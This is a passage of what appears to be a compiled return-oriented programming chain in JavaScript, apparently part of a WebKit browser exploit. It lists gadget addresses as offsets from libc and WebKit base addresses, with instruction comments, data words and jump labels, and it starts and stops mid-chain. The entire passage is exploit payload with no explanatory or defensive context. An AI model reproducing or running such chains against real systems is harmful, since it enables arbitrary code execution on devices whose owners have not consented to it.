db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+531856, //L11699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11699:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+531912, //L11700
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11700:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+531992, //L11703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11703:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+532048, //L11704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11704:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+532184, //L11708
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+532168, //L11707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11706:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11707:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11708:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+532248, //L11709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11709:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11711:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+532328, //L11712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11712:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11713:
db([8, 0]); // 0x8
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11714:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L11715:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+532512, //L11717
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11716:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11717:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+532584, //L11718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11718:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11720:
db([4294967203, 4294967295]); // -0x5d
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+1121481, //mov [rax], cl
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L11722:
db([4294967203, 4294967295]); // -0x5d
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+532744, //L11725
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+532728, //L11723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11723:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11725:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+532904, //L11729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+532872, //L11727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+532888, //L11728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11726:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L11727:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11728:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11729:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+532960, //L11731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L11731:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+533088, //L11733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+533104, //L11734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+533072, //L11732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11732:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11733:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11734:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+533264, //L11738
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+533232, //L11736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+533248, //L11737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11735:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L11736:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11737:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11738:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+533320, //L11740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L11740:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+533448, //L11742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+533464, //L11743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+533432, //L11741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11741:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11742:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11743:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+533576, //L11745
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+533624, //L11748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+533592, //L11746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11745:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11746:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11747:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11748:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+533736, //L11749+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+533728, //L11749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11749:
db([0, 0]); // 0x0
set_gadgets([
ropchain+533752, //L11749+24
ropchain+537832, //L11744
libc_base+764760, //pop rsi
ropchain+533792, //L11750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11750:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11752:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+533912, //L11755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+533896, //L11753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11753:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11755:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+534088, //L11758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+534104, //L11759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+534056, //L11756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+534072, //L11757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11756:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11757:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11758:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11759:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+534200, //L11761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+534184, //L11760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11760:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11761:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+534280, //L11762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11762:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11764:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+534400, //L11767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+534384, //L11765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11765:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11767:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+534576, //L11770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+534592, //L11771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+534544, //L11768
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+534560, //L11769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11768:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11769:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11770:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11771:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+534688, //L11773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+534672, //L11772
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11772:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11773:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+534768, //L11774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11774:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11776:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+534888, //L11779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+534872, //L11777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11777:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11779:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+535064, //L11782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+535080, //L11783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+535032, //L11780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+535048, //L11781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11780:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11781:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11782:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11783:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+535176, //L11785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+535160, //L11784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11784:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11785:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+535272, //L11787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11786:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11787:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11788:
db([16, 0]); // 0x10
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+535392, //L11790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+535376, //L11789
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11789:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11790:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11791:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11792:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+535560, //L11793
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11793:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11795:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+535680, //L11798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+535664, //L11796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11796:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11798:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+535840, //L11802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+535792, //L11799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+535808, //L11800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11799:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11800:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11801:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L11802:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+535896, //L11803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11803:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11805:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+536016, //L11806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+536032, //L11808
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11806:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11808:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+536176, //L11811
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+536144, //L11809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+536160, //L11810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11809:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11810:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11811:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+536256, //L11812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11812:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11814:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+536376, //L11817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+536360, //L11815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11815:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11817:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+536520, //L11820
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+536488, //L11818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+536504, //L11819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11818:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11819:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11820:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+536600, //L11821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11821:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11823:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+536720, //L11826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+536704, //L11824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11824:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11826:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+536864, //L11829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+536832, //L11827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+536848, //L11828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11827:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11828:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11829:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+536944, //L11830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11830:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11832:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+537064, //L11835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+537048, //L11833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11833:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11835:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+537208, //L11838
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+537176, //L11836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+537192, //L11837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11836:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11837:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11838:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+537288, //L11839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11839:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11841:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+537408, //L11844
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+537392, //L11842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11842:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11844:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+537552, //L11847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+537520, //L11845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+537536, //L11846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11845:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11846:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11847:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L11849:
ropchain+537656, //L11848
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+296568, //__ntoa_long_long
//L11848:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967216, 4294967295]); // -0x50
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+537728, //L11850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11850:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11852:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+537808, //L11854
